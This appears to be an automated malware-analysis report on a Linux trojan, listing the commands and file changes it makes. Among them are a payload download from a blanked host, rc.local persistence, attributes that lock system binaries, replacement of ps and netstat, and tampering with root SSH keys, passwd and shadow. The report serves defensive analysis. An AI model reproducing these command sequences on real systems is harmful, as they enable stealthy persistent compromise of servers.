Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /etc/rc.local
Malicious functions:
Removes itself
Gets access to SSH keys
- /root/.ssh/authorlzed_keys
- /root/.ssh/
Modifies firewall settings:
- iptables -L INPUT
- iptables -D INPUT -s -j DROP
Replaces the following system files:
- /bin/ps
- /bin/sedYc3yag
Manages services:
- service network restart
- systemctl restart network.service
Launches processes:
- /bin/sh <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/sh <SAMPLE_FULL_PATH> -c
- cp -f /usr/bin/chattr /usr/bin/lockr
- cp -f /usr/bin/chattr /usr/bin/.locks
- cp -f /usr/bin/.locks /usr/bin/lockr
- chmod 777 /usr/bin/lockr
- chmod 777 /usr/bin/.locks
- lockr +i /usr/bin/lockr
- lockr +i /usr/bin/.locks
- lockr -i /usr/bin/dget
- chmod 777 /usr/bin/dget
- lockr +i /usr/bin/dget
- lockr -i /usr/bin/pkill
- chmod 777 /usr/bin/pkill
- lockr +i /usr/bin/pkill
- lockr -i /usr/bin/nohup
- chmod 777 /usr/bin/nohup
- lockr +i /usr/bin/nohup
- lockr -i /usr/bin/killall
- chmod 777 /usr/bin/killall
- lockr +i /usr/bin/killall
- lockr -i /usr/bin/nslookup
- chmod 777 /usr/bin/nslookup
- lockr +i /usr/bin/nslookup
- lockr -i /usr/bin/
- lockr -i /etc/init.d/
- cat /etc/long.conf
- awk {print $1}
- date +%s%N
- md5sum
- head -c 10
- awk {print $2}
- nslookup linux.bc5j.com
- grep Address:
- lockr -i /etc/
- lockr -i /etc/resolv.conf
- lockr +i /etc/resolv.conf
- sleep 1
- mkdir /usr/bin/dpkgd/
- cp -f /bin/ss /usr/bin/dpkgd/ss
- cp -f /bin/ss /usr/bin/iss
- chmod 777 /usr/bin/iss
- chmod 777 /usr/bin/dpkgd/ss
- lockr +i /usr/bin/dpkgd/ss
- lockr +i /usr/bin/iss
- cp -f /bin/netstat /usr/bin/dpkgd/netstat
- cp -f /bin/netstat /usr/bin/nets
- chmod 777 /usr/bin/nets
- chmod 777 /usr/bin/dpkgd/netstat
- lockr +i /usr/bin/dpkgd/netstat
- lockr +i /usr/bin/nets
- cp -f /bin/ps /usr/bin/dpkgd/ps
- cp -f /bin/ps /usr/bin/ips
- chmod 777 /usr/bin/ips
- chmod 777 /usr/bin/dpkgd/ps
- lockr +i /usr/bin/dpkgd/ps
- lockr +i /usr/bin/ips
- cp -f /etc/hosts.deny /etc/deny.bak
- lockr +i /etc/deny.bak
- cp -f /etc/hosts.allow /etc/allow.bak
- lockr +i /etc/allow.bak
- grep
- grep ACCEPT
- ips -ef
- grep byquange
- grep -v grep
- wc -l
- lockr -i /usr/bin/stone
- rm -f /usr/bin/stone
- dget http://:5788/stone
- sh -c command -v curl >/dev/null 2>&1
- sh -c command -v wget >/dev/null 2>&1
- sh -c /bin/bash -c 'DGET_PATH=''
- /bin/bash -c DGET_PATH=
- mv -f /usr/bin/stone /usr/bin/f2d3e2f4b1
- nets -anept
- grep :2898
- cut -d / -f 1
- awk {print $9}
- killall byquange
- pkill byquange
- lockr -i /usr/bin/byquange
- rm -f /usr/bin/byquange
- lockr -i /etc/long.conf
- sed -i s|byquange|f2d3e2f4b1| /etc/long.conf
- lockr +i /etc/long.conf
- cat /bin/ps
- lockr -i /bin/
- lockr -i /bin/ps
- chmod 777 /bin/ps
- lockr +i /bin/ps
- grep :2897
- chmod 777 /usr/bin/f2d3e2f4b1
- cp -f /usr/bin/f2d3e2f4b1 /usr/bin/longbak
- nohup /usr/bin/f2d3e2f4b1
- /usr/bin/f2d3e2f4b1
- chmod 777 /usr/bin/longbak
- lockr +i /usr/bin/longbak
- cat /etc/rc.local
- grep start
- lockr -i /etc/rc.local
- sed -i /start/d /etc/rc.local
- grep /usr/bin/3529885178
- grep exit 0
- sed -i s|exit 0|/usr/bin/d6e152dfcd start| /etc/rc.local
- cat /etc/passwd
- grep quange
- lockr -i /etc/passwd
- lockr -a /etc/passwd
- lockr +i /etc/passwd
- cat /etc/shadow
- lockr -i /etc/shadow
- lockr -a /etc/shadow
- lockr +i /etc/shadow
- lockr -i /root/.ssh/
- lockr -i /root/.ssh/authorlzed_keys
- mkdir -p /root/.ssh
- rm -f /root/.ssh/authorized_keys*
- /etc/init.d/sshd restart
- lockr +i /root/.ssh/authorlzed_keys
- date +%F
- netstat -ntlp
- grep sshd
- awk -F: {if($4!=\"\")print $4}
- /sbin/ifconfig -a
- grep inet
- grep -v 127.0.0.1
- grep -v inet6
- tr -d addr:
- nslookup ftp.bc5j.com
- chmod 0755 /etc/up-date
- killall .sshd
- nohup /etc/up-date
- /etc/up-date
- ftp -n
- pkill .sshd
- cat /dev/null
- rm -rf /etc/up-date
- lockr -i /usr/bin/.sshd
- rm -f /usr/bin/.sshd
- lockr -i /usr/bin/wget
- rm -f /usr/bin/wget
- lockr -i /usr/bin/chattr
- rm -f /usr/bin/chattr
- lockr -i /etc/hosts.deny
- cp -f /etc/deny.bak /etc/hosts.deny
- lockr +i /etc/hosts.deny
- lockr -i /etc/hosts.allow
- cp -f /etc/allow.bak /etc/hosts.allow
- lockr +i /etc/hosts.allow
- sed -i s|3529885178|d6e152dfcd| /etc/long.conf
- cp -f <SAMPLE_FULL_PATH> /usr/bin/d6e152dfcd
- chmod 777 /usr/bin/d6e152dfcd
- nohup /usr/bin/d6e152dfcd
- /usr/bin/d6e152dfcd
- /bin/sh /usr/bin/d6e152dfcd -c exec '/usr/bin/d6e152dfcd' \"$@\" /usr/bin/d6e152dfcd
- sed -i s|3529885178|d6e152dfcd| /bin/ps
- /bin/sh /usr/bin/d6e152dfcd -c
- .locks -i /usr/bin/lockr
- sed -i s|/usr/bin/3529885178 start|/usr/bin/d6e152dfcd start| /etc/rc.local
- lockr -i <SAMPLE_FULL_PATH>
- rm -f <SAMPLE_FULL_PATH>
Performs operations with the file system:
Modifies file access rights:
- /usr/bin/lockr
- /usr/bin/.locks
- /usr/bin/dget
- /usr/bin/pgrep
- /usr/bin/nohup
- /usr/bin/killall
- /usr/bin/nslookup
- /usr/bin/iss
- /usr/bin/dpkgd/ss
- /usr/bin/nets
- /usr/bin/dpkgd/netstat
- /usr/bin/ips
- /usr/bin/dpkgd/ps
- /etc/sedySpd6n
- /bin/ps
- /etc/sed1pwHLJ
- /etc/sedolbihn
- /etc/up-date
- /etc/sed7M9cgd
- /usr/bin/d6e152dfcd
- /bin/sedYc3yag
- /etc/sedbON6uL
Creates folders:
- /usr/bin/dpkgd
- /root/.ssh
Creates or modifies files:
- /usr/bin/lockr
- /usr/bin/.locks
- /etc/long.conf
- /etc/resolv.conf
- /usr/bin/dpkgd/ss
- /usr/bin/iss
- /usr/bin/dpkgd/netstat
- /usr/bin/nets
- /usr/bin/dpkgd/ps
- /usr/bin/ips
- /etc/deny.bak
- /etc/allow.bak
- /etc/sedySpd6n
- /etc/sed1pwHLJ
- /etc/sedolbihn
- /etc/passwd
- /etc/shadow
- /etc/ssh/sshd_config
- /etc/192.168.218.50
- /etc/up-date
- /etc/hosts.deny
- /etc/hosts.allow
- /etc/sed7M9cgd
- /usr/bin/d6e152dfcd
- /bin/sedYc3yag
- /etc/sedbON6uL
Deletes files:
- /usr/bin/stone
- /usr/bin/byquange
- /root/.ssh/authorized_keys*
- /etc/up-date
- /usr/bin/.sshd
- /usr/bin/wget
- /usr/bin/chattr
Network activity:
DNS ASK:
- li###.bc5j.com
- ft#.#c5j.com
Other:
Collects CPU information
Collects RAM information
Collects information about network activity